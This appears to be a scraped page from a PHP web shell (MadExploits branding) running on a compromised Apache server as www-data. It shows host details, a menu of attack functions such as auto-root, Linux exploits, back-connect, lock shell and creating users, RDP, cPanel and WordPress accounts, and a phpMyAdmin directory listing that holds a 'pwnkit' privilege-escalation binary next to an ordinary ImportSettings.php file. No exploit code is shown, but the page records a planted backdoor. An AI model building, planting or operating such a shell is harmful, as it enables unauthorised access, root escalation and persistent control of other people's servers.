Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.144.80.91
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Import /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Ajax.php
2.8
KB
-rw-r--r--
AnalysedColumn.php
262
B
-rw-r--r--
ColumnType.php
184
B
-rw-r--r--
DecimalSize.php
760
B
-rw-r--r--
Import.php
41.5
KB
-rw-r--r--
ImportSettings.php
1.12
KB
-rw-r--r--
ImportTable.php
336
B
-rw-r--r--
SimulateDml.php
4.85
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ImportSettings.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Import; final class ImportSettings { public static bool $charsetConversion = false; public static string $charsetOfFile = ''; public static int $readMultiply = 0; public static int $readLimit = 0; public static bool $goSql = false; public static bool $sqlQueryDisabled = false; public static int $maxSqlLength = 0; public static int $skipQueries = 0; public static int $executedQueries = 0; /** @var array{sql:string, error:string}[] */ public static array $failedQueries = []; public static bool $timeoutPassed = false; public static string $importNotice = ''; public static int $offset = 0; public static bool $finished = false; public static bool $runQuery = false; public static int $maximumTime = 0; public static int $timestamp = 0; public static string $message = ''; public static string $importFile = ''; /** @var 'query'|'table'|'database'|'server'|'' */ public static string $importType = ''; public static string $importFileName = ''; public static string $localImportFile = ''; }
Close